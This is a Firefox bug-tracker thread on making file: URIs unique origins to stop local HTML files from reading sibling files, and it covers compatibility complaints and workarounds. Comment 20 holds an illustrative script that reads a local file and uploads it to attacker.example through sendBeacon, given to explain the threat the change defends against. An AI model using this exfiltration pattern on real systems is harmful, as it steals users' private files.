Treating file: URIs as unique origins
Categories
(Core :: DOM: Security, enhancement, P3)
People
(Reporter: ckerschb, Assigned: baku)
References
(Regressed 1 open bug)
Details
(Whiteboard: [domsecurity-backlog1])
Attachments
(1 file, 2 obsolete files)
Comment 1•5 years ago
I don't think we can just get rid of NS_RelaxStrictFileOriginPolicy (the nsNetUtil.cpp link above) because it's now also used from https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/workers/WorkerLoadInfo.cpp#288 to decide which "same origin" scripts could be loaded. Might be able to rethink the scope for that, but meanwhile it appears to be good enough to simply remove the call to NS_RelaxStrictFileOriginPolicy from ContentPrincipal.cpp
That is, delete https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/caps/ContentPrincipal.cpp#328-336
Comment 2•5 years ago
Are there edge cases you can think of, bz? Is there navigational inheritance we need to worry about?
Comment 3•5 years ago
Or, since it's the evening before a US holiday, maybe baku can answer when he gets up in a few hours.
Comment 4•5 years ago
Comment 5•5 years ago
Depends on D36854
Comment 6•5 years ago
The navigational inheritance bits are at https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/base/nsContentUtils.cpp#6508 which calls nsIPrincipal::CheckMayLoad and will land in ContentPrincipal::MayLoadInternal, which is exactly the bit comment 2 is removing. So if we remove that bit we should just remove all of https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/base/nsContentUtils.cpp#6499-6511
I don't think we can really keep the navigation inheritance bits working if we actually want to prevent things like "load the other file in an iframe and then read it", at least for a bunch of file formats....
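To make that concrete, here is a minimal sketch (not from the bug; all paths are hypothetical) of the "load the other file in an iframe and then read it" pattern that the relaxed file: origin policy permitted:
```typescript
// Hypothetical attacker page saved as file:///home/user/Downloads/evil.html.
// Under the relaxed policy, another file in the same directory was treated as
// same-origin, so once framed its contents could be read from script.
const frame = document.createElement("iframe");
frame.src = "file:///home/user/Downloads/secret.txt"; // hypothetical sibling file
frame.addEventListener("load", () => {
  // With file: URIs as unique origins, this cross-origin access now fails.
  const leaked = frame.contentDocument?.body.textContent;
  console.log(leaked);
});
document.body.appendChild(frame);
```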
Assignee
Comment 7•5 years ago
I don't think we can just get rid of NS_RelaxStrictFileOriginPolicy (the nsNetUtil.cpp link above) because it's now also used from https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/workers/WorkerLoadInfo.cpp#288
If we treat file: URLs as unique origins, we can simplify that code and remove NS_RelaxStrictFileOriginPolicy from WorkerLoadInfo too.
The only way a file: URL script can create a worker is to load itself as a worker. Any other file: URL will be considered cross-origin.
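A rough illustration of that rule (paths are hypothetical, not from the bug):
```typescript
// Hypothetical: code whose principal is the file: URL
// file:///home/user/app/main.js (for example, a worker script spawning
// sub-workers). With file: URIs treated as unique origins, only the exact
// same file: URL is same-origin.
new Worker("file:///home/user/app/main.js");   // loads itself: same-origin, allowed
new Worker("file:///home/user/app/helper.js"); // different file: URL: cross-origin, blocked
```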
Comment 8•5 years ago
(In reply to Andrea Marchesini [:baku] from comment #7)
The only way a file: URL script can create a worker is to load itself as a worker. Any other file: URL will be considered cross-origin.
That might break a bunch of tests and local development. Should we do something else there to special-case loading file: workers from file: documents?
Comment 9•5 years ago
(In reply to Boris Zbarsky [:bzbarsky, bz on IRC] from comment #6)
So if we remove that bit we should just remove all of https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/base/nsContentUtils.cpp#6499-6511
My current removal preserves the security.fileuri.strict_origin_policy=false case, buried in the call to nsScriptSecurityManager::SecurityCompareURIs just above the bit I removed. A bunch of tests seem to use that. Not sure I'm ready to break that case, especially since that was going to be my recommendation to anyone we break who's depending on the current behavior.
I don't think we can really keep the navigation inheritance bits working if we actually want to prevent things like "load the other file in an iframe and then read it", at least for a bunch of file formats....
I definitely don't want to keep that working, just wanted to make sure I wasn't missing a chunk of code if it was implemented using different checks.
Assignee
Comment 10•5 years ago
That might break a bunch of tests and local development. Should we do something else there to special-case loading file: workers from file: documents?
I don't think so, mainly for two reasons:
1. Local development these days is done via a local web server (a minimal sketch follows below).
2. This change will align Firefox with Chrome and Safari.
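For reference, a minimal sketch of such a local server (assumptions: Node.js running TypeScript; the port and MIME table are arbitrary choices; there is no hardening, so it is for local use only). Something like `python3 -m http.server` works just as well.
```typescript
// Serve the current directory over http://localhost:8080 so pages, scripts,
// fonts, XML, and XSL share one http origin instead of separate file: URLs.
import { createServer } from "node:http";
import { readFile } from "node:fs/promises";
import { extname, join } from "node:path";

const types: Record<string, string> = {
  ".html": "text/html",
  ".js": "text/javascript",
  ".css": "text/css",
  ".xml": "text/xml",
  ".xsl": "text/xml",
  ".woff2": "font/woff2",
};

createServer(async (req, res) => {
  try {
    // Map the request path onto the current directory (no traversal checks:
    // this is a local development sketch, not a production server).
    const urlPath = decodeURIComponent((req.url ?? "/").split("?")[0]);
    const file = join(process.cwd(), urlPath.endsWith("/") ? urlPath + "index.html" : urlPath);
    const body = await readFile(file);
    res.writeHead(200, { "Content-Type": types[extname(file)] ?? "application/octet-stream" });
    res.end(body);
  } catch {
    res.writeHead(404);
    res.end("not found");
  }
}).listen(8080);
```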
Comment 11•5 years ago
In that case we'll want to just remove NS_RelaxStrictFileOriginPolicy entirely.
Comment 12•5 years ago
Chrome has an --allow-file-access-from-files command line option. I want a similar escape hatch.
Comment 13•5 years ago
especially since that was going to be my recommendation to anyone we break who's depending on the current behavior
Setting security.fileuri.strict_origin_policy to false is a lot more dangerous than the current behavior... I'd be pretty loath to recommend it to anyone in good conscience.
Comment 14•5 years ago
The strict file: URL origin policy in this bug fix breaks desktop apps across the board that use font-awesome via local resources. I imagine there are a huge number of Bootstrap apps that are now broken in Firefox.
Comment 15•5 years ago
As a vendor of local help systems, we strongly urge you to consider allowing font-awesome resources to be loaded without having to disable the privacy.file_unique_origin preference. I have attached a simple example use case.
Thank you,
Comment 16•5 years ago
Tony, I filed bug 1566172 to track that. Thank you for reporting it!
Comment 17•5 years ago
Actually, looks like bug 1565942 tracked that already, so probably best to follow along there for the specific file:// issue.
Comment 18•5 years ago
Fixed in Firefox 68 by the patch in bug 1558299, https://hg.mozilla.org/mozilla-central/rev/2ad059cc9e78
Comment 19•5 years ago
potentially allowing uploads of user sensitive data to an attacker controlled server
Why don't we only block that part? It sounds cleverer than the current solution, which will break help systems or XML+XSL content that sits on CD-ROMs everywhere.
Has anyone investigated the claim that people store all downloads in the same dir? I'm not sure of that. Not sure at all.
So is there really a need?
Comment 20•5 years ago
Why don't we only block that part?
Because blocking data exfiltration is hard.
Has anyone investigated the claim that people store all downloads in the same dir?
That's the default behavior of all browsers: downloads go in the user's Downloads directory. So yes, this claim is true for the vast majority of people. Keep in mind that "downloads" includes things you open in a helper app, by the way.
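To make the threat model concrete, a sketch of the exfiltration pattern being discussed (the file names and server URL are hypothetical). Under the relaxed policy the read succeeded; with file: URIs as unique origins it does not:
```typescript
// Hypothetical downloaded page: file:///home/user/Downloads/invoice.html.
// The relaxed policy treated other files in the same directory as same-origin,
// so a script in this page could read them...
const xhr = new XMLHttpRequest();
xhr.open("GET", "file:///home/user/Downloads/tax-return.txt"); // hypothetical sibling file
xhr.onload = () => {
  // ...and upload the contents to an attacker-controlled server (hypothetical URL).
  navigator.sendBeacon("https://attacker.example/upload", xhr.responseText);
};
xhr.send();
```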
Comment 21•5 years ago
Do you really have HTML in your download dir?
In my download dir I only have zips, PDFs, and maybe an exe I explicitly chose to download.
HTML files end up in my cache, and I won't click any HTML in my cache.
Why not apply the unique-origin rule to the download dir only?
Comment 22•5 years ago
Or allow an extension to trap the unique-origin violation for the file:// protocol and offer to launch a local server for the directory.
Comment 23•4 years ago
Is there any way to display a local XML file with a local XSLT stylesheet without setting security.fileuri.strict_origin_policy to false?
Chrome has the same issue, so I don't know the correct way to display local XML inside a web browser.
Comment 24•4 years ago
@ null:)
You can't.
Chrome and then Firefox decided this poses a security threat.
Your only option is to host your xml + xsl on a server.
Or use IE.
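For completeness, once the XML and XSL are served from the same local http origin (for example with a small static server like the one sketched earlier), the transform can also be applied explicitly from script. A hedged sketch with hypothetical file names:
```typescript
// Assumes data.xml and style.xsl (hypothetical names) are served from the
// same local http server as this page. XSLTProcessor applies the stylesheet
// client-side, mirroring what the xml-stylesheet processing instruction does.
async function loadXml(url: string): Promise<Document> {
  const text = await (await fetch(url)).text();
  return new DOMParser().parseFromString(text, "application/xml");
}

const xml = await loadXml("data.xml");
const xsl = await loadXml("style.xsl");

const processor = new XSLTProcessor();
processor.importStylesheet(xsl);
document.body.replaceChildren(processor.transformToFragment(xml, document));
```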